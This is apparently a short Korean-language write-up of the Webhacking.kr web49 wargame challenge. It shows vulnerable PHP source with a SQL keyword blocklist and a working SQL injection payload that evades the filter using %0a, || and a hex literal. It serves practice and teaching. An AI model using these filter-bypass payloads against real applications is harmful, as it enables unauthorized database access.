Post

Webhacking.kr - web49

Wargame, Webhacking.kr
Posted

web49

1
2
3
4
5
6
7
8
9

<?php
  if($_GET['lv']){
    $db = dbconnect();
    if(preg_match("/select|or|and|\(|\)|limit|,|\/|order|cash| |\t|\'|\"/i",$_GET['lv'])) exit("no hack");
    $result = mysqli_fetch_array(mysqli_query($db,"select id from chall49 where lv={$_GET['lv']}"));
    echo $result[0] ;
    if($result[0]=="admin") solve(49);
  }
?>

Solution

1
2

공백은 %0a로 우회, or은 ||로 우회, '는 hex값으로 우회해서 ?lv=6 or id like 'ad%'을 해주면 됨.
?lv=6||id%0alike%0a0x616425
Wargame, Webhacking.kr
This post is licensed under CC BY 4.0 by the author.